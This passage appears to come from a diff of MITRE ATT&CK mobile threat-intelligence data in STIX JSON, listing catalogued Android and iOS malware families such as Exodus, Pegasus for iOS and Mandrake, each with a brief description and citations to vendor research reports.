Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exodus", + "Exodus One", + "Exodus Two" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "type": "malware", + "created": "2019-09-03T19:45:47.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0405", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0405" + }, + { + "source_name": "Exodus One", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "Exodus Two", + "description": "(Citation: SWB Exodus March 2019)" + }, + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-10-14T17:15:52.191Z", + "name": "Exodus", + "description": "[Exodus](https://attack.mitre.org/software/S0405) is Android spyware deployed in two distinct stages named Exodus One (dropper) and Exodus Two (payload).(Citation: SWB Exodus March 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Dendroid", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Dendroid" + ], + "type": "malware", + "id": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "created": "2017-10-25T14:48:37.438Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0301", + "external_id": "S0301" + }, + { + "source_name": "Dendroid", + "description": "(Citation: Lookout-Dendroid)" + }, + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. 
Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "WireLurker", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "created": "2017-10-25T14:48:37.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0312", + "external_id": "S0312" + }, + { + "source_name": "WireLurker", + "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", + "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + }, + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. 
Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Desert Scorpion" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "type": "malware", + "created": "2020-09-11T14:54:16.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0505", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0505" + }, + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2021-04-19T17:11:50.159Z", + "name": "Desert Scorpion", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) is surveillanceware that has targeted the Middle East, specifically individuals located in Palestine. [Desert Scorpion](https://attack.mitre.org/software/S0505) is suspected to have been operated by the threat actor APT-C-23.(Citation: Lookout Desert Scorpion) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for iOS", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. 
It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for iOS" + ], + "type": "malware", + "id": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "created": "2017-10-25T14:48:44.238Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0289", + "external_id": "S0289" + }, + { + "source_name": "Pegasus for iOS", + "description": "(Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab)" + }, + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + }, + { + "source_name": "PegasusCitizenLab", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Tangelo", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. 
It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Tangelo" + ], + "type": "malware", + "id": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0329", + "external_id": "S0329" + }, + { + "source_name": "Tangelo", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RCSAndroid", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. 
(Citation: TrendMicro-RCSAndroid)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RCSAndroid" + ], + "type": "malware", + "id": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "created": "2017-10-25T14:48:38.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0295", + "external_id": "S0295" + }, + { + "source_name": "RCSAndroid", + "description": "(Citation: TrendMicro-RCSAndroid)" + }, + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Corona Updates", + "Wabi Music", + "Concipit1248" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "type": "malware", + "created": "2020-04-24T15:06:32.870Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0425", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0425" + }, + { + "source_name": "Wabi Music", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": 
"Concipit1248", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:45:38.235Z", + "name": "Corona Updates", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Skygofree", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. 
(Citation: Kaspersky-Skygofree)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Skygofree" + ], + "type": "malware", + "id": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0327", + "external_id": "S0327" + }, + { + "source_name": "Skygofree", + "description": "(Citation: Kaspersky-Skygofree)" + }, + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "KeyRaider", + "description": "[KeyRaider](https://attack.mitre.org/software/S0288) is malware that steals Apple account credentials and other data from jailbroken iOS devices. It also has ransomware functionality. 
(Citation: Xiao-KeyRaider)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "created": "2017-10-25T14:48:43.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0288", + "external_id": "S0288" + }, + { + "source_name": "KeyRaider", + "description": "(Citation: Xiao-KeyRaider)" + }, + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ZergHelper", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple's App Store review process. No malicious functionality was identified in the app, but it presents security risks. 
(Citation: Xiao-ZergHelper)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "created": "2017-10-25T14:48:44.853Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0287", + "external_id": "S0287" + }, + { + "source_name": "ZergHelper", + "description": "(Citation: Xiao-ZergHelper)" + }, + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DoubleAgent" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "type": "malware", + "created": "2020-12-24T21:50:02.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0550", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0550" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). 
Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T17:05:42.253Z", + "name": "DoubleAgent", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Twitoor", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Twitoor" + ], + "type": "malware", + "id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "created": "2017-10-25T14:48:42.313Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0302", + "external_id": "S0302" + }, + { + "source_name": "Twitoor", + "description": "(Citation: ESET-Twitoor)" + }, + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. 
Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-13T22:32:16.509Z", + "name": "S.O.V.A.", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for \"owl\", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "S.O.V.A." + ], + "type": "malware", + "id": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "created": "2023-02-06T19:34:43.026Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1062", + "external_id": "S1062" + }, + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + }, + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "ANDROIDOS_ANSERVER.A", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. (Citation: TrendMicro-Anserver)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "ANDROIDOS_ANSERVER.A" + ], + "type": "malware", + "id": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "created": "2017-10-25T14:48:47.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0310", + "external_id": "S0310" + }, + { + "source_name": "ANDROIDOS_ANSERVER.A", + "description": "(Citation: TrendMicro-Anserver)" + }, + { + "source_name": "TrendMicro-Anserver", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. 
Retrieved February 6, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DualToy", + "description": "[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "created": "2017-10-25T14:48:41.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0315", + "external_id": "S0315" + }, + { + "source_name": "DualToy", + "description": "(Citation: PaloAlto-DualToy)" + }, + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. 
Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Mandrake", + "oxide", + "briar", + "ricinus", + "darkmatter" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "type": "malware", + "created": "2020-07-15T20:20:58.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0485", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0485" + }, + { + "source_name": "oxide", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "briar", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "ricinus", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "darkmatter", + "description": "(Citation: Bitdefender Mandrake)" + }, + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-09-11T15:52:12.097Z", + "name": "Mandrake", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) is a sophisticated Android espionage platform that has been active in the wild since at least 2016. 
[Mandrake](https://attack.mitre.org/software/S0485) is very actively maintained, with sophisticated features and attacks that are executed with surgical precision.\n\n[Mandrake](https://attack.mitre.org/software/S0485) has gone undetected for several years by providing legitimate, ad-free applications with social media and real reviews to back the apps. The malware is only activated when the operators issue a specific command.(Citation: Bitdefender Mandrake)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "X-Agent for Android", + "description": "[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) Is it tracked separately from the [CHOPSTICK](https://attack.mitre.org/software/S0023).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--56660521-6db4-4e5a-a927-464f22954b7c", + "created": "2017-10-25T14:48:42.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0314", + "external_id": "S0314" + }, + { + "source_name": "X-Agent for Android", + "description": "(Citation: CrowdStrike-Android)" + }, + { + "source_name": "CrowdStrike-Android", + "description": "CrowdStrike Global Intelligence Team. (2016). 
Use of Fancy Bear Android Malware in Tracking of Ukrainian FIeld Artillery Units. Retrieved February 6, 2017.", + "url": "https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Lukáš Štefanko, ESET" + ], + "x_mitre_aliases": [ + "DEFENSOR ID" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "type": "malware", + "created": "2020-06-26T15:12:39.648Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0479", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0479" + }, + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T20:16:31.850Z", + "name": "DEFENSOR ID", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim’s bank account or cryptocurrency wallet and taking over email or social media accounts. 
[DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android’s accessibility service.(Citation: ESET DEFENSOR ID) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "MazarBOT", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "created": "2017-10-25T14:48:40.875Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0303", + "external_id": "S0303" + }, + { + "source_name": "MazarBOT", + "description": "(Citation: Tripwire-MazarBOT)" + }, + 